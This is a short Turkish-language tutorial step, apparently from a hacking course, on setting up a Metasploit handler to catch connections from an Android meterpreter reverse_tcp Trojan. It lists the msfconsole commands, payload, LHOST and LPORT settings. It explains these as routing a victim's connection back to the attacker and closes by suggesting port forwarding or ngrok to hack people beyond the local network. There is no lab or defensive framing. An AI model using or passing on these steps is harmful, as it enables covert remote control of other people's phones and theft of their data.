Bir Trojanı dinlemeye almak için önce ./msfconsole yazıp enter tuşuna                                                                                                                                                                                             
basıyoruz açıldıktan sonra "use exploit/multi/handler" yazıyoruz                                                                                                                                                                                                  
bundan sonrada "set payload" yazıp payloadımızın adını yazıyoruz                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  
önceki derste payloadımız "android/meterpreter/reverse_tcp" şeklindeydi                                                                                                                                                                                           
payloadımızı eklemek için "set" yazıyoruz set seçmek anlamına gelir                                                                                                                                                                                               
"set payload" yazarak payload seçeceğimizi belirtiyoruz.                                                                                                                                                                                                          
Yani yazmamız gereken "set payload android/meterpreter/reverse_tcp" yazmak.                                                                                                                                                                                       
sonra "show options" yazıyoruz. Bunu yazarak payload için ayar yapacağız                                                                                                                                                                                          
                                                                                                                                                                                                                                                                  
sonrada "set LHOST <Kendi IP Adresiniz>" yani "set LHOST 192.168.1.32" gibi                                                                                                                                                                                       
sonrada "set LPORT 8080" yazın                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                  
Tafsilat: LHOST Nedir?                                                                                                                                                                                                                                            
LHOST virüsü açan bir kişiden bağlantı geldiğinde bağlantıyı                                                                                                                                                                                                      
hangi IP adresine göndereceğini belirtmek için kullanılır                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                  
LPORT Nedir?                                                                                                                                                                                                                                                      
LPORT Bağlantıyı hangi portlar üzerinden saldırgana göndereceğini                                                                                                                                                                                                 
belirtmek için kullanılır

Not: Bu Virüs Sadece Kendi Modeminize Bağlı Olanlarda İşe Yarar Başka Bir yerdeki Birisini Hacklemek İçin Port Açmanız Veya Ngrok Kullanmanız Gerekir.